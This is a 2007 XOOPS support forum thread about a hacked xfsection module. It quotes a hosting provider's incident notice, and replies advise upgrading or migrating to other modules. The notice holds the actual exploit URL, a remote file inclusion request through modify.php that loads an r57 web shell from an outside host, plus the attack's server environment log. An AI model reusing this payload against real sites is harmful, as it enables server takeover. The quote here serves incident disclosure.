1
jimbofoxman
xfsection was hacked

I was running 1.07 and I see there is a security update for it , ver 1.11. It was an active module, just not used or visible from the site.

Quote:
We need to inform you that your hosting account for farmngarden.com has been hacked and used to run illegal software on the server.



To prevent further abuse of your account and the server, we have disabled the following location on your account:



/www/www//modules/xfsection



Here is how the hackers have exploited your account:



http://www.farmngarden.com//modules/xfsection/modify.php?dir_module=http://www.revitalizemassage.com/xpl/r57??



Please check the environmental variables of the process for your user:



PATH=/usr/local/bin:/usr/bin:/bin

CONTENT_LENGTH=108

CONTENT_TYPE=application/x-www-form-urlencoded

DOCUMENT_ROOT=/home/farmngar/www/www

HTTP_ACCEPT=image/gif,

HTTP_ACCEPT_ENCODING=gzip,

HTTP_ACCEPT_LANGUAGE=pt-br

HTTP_CACHE_CONTROL=no-cache

HTTP_CONNECTION=Keep-Alive

HTTP_COOKIE=PHPSESSID=8e826cc35162383394cdb7b917a626f1;

HTTP_HOST=www.farmngarden.com

HTTP_REFERER=http://www.farmngarden.com//modules/xfsection/modify.php?dir_module=http://www.revitalizemassage.com/xpl/r57??

HTTP_USER_AGENT=Mozilla/4.0

REMOTE_ADDR=200.175.81.60

REMOTE_PORT=61272

SCRIPT_FILENAME=/home/farmngar/www/www//modules/xfsection/modify.php

SERVER_ADDR=216.35.196.92

SERVER_ADMIN=admin@farmngarden.com

SERVER_NAME=www.farmngarden.com

SERVER_PORT=80

SERVER_SOFTWARE=Apache

GATEWAY_INTERFACE=CGI/1.1

SERVER_PROTOCOL=HTTP/1.1

REQUEST_METHOD=POST

QUERY_STRING=dir_module=http://www.revitalizemassage.com/xpl/r57??

REQUEST_URI=//modules/xfsection/modify.php?dir_module=http://www.revitalizemassage.com/xpl/r57??

SCRIPT_NAME=//modules/xfsection/modify.php

2
Anonymous
Re: xfsection was hacked
  • 2007/5/29 11:53

  • Anonymous

  • Posts: 0

  • Since:


Try to upgrade to xfsection v1.12a

3
McDonald
Re: xfsection was hacked
  • 2007/5/29 14:22

  • McDonald

  • Home away from home

  • Posts: 1072

  • Since: 2005/8/15


Not sure but I think the development of XF-Sections has stopped.
1.12 is latest and last.

Happy Linux:
Quote:
XFsection's development is finished in this version (v1.12a).

4
irmtfan
Re: xfsection was hacked
  • 2007/5/29 16:20

  • irmtfan

  • Module Developer

  • Posts: 3419

  • Since: 2003/12/7


i suggest and also recommend importing xfsection to smartsection or article ( by phppp). both import scripts are fully tested.

5
Anonymous
Re: xfsection was hacked
  • 2007/5/29 19:38

  • Anonymous

  • Posts: 0

  • Since:


Moving to smartsection is good idea .. I will test this converter in my site.

6
Anonymous
Re: xfsection was hacked
  • 2007/5/29 19:55

  • Anonymous

  • Posts: 0

  • Since:


Hi irmtfan,

I install smartsection 2.13 now but when I click on import I got this message:

As no other supported article module are installed on this site, no article can be imported.

my xfsection is 1.12a ! any help ?

7
Anonymous
Re: xfsection was hacked
  • 2007/5/29 20:06

  • Anonymous

  • Posts: 0

  • Since:


Hi,

I test this converter from ohwada ( xfsection programmer ) and it's working fine:

http://smartfactory.ca/modules/wfdownloads/singlefile.php?cid=18&lid=69


Login

Who's Online

373 user(s) are online (270 user(s) are browsing Support Forums)


Members: 0


Guests: 373


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits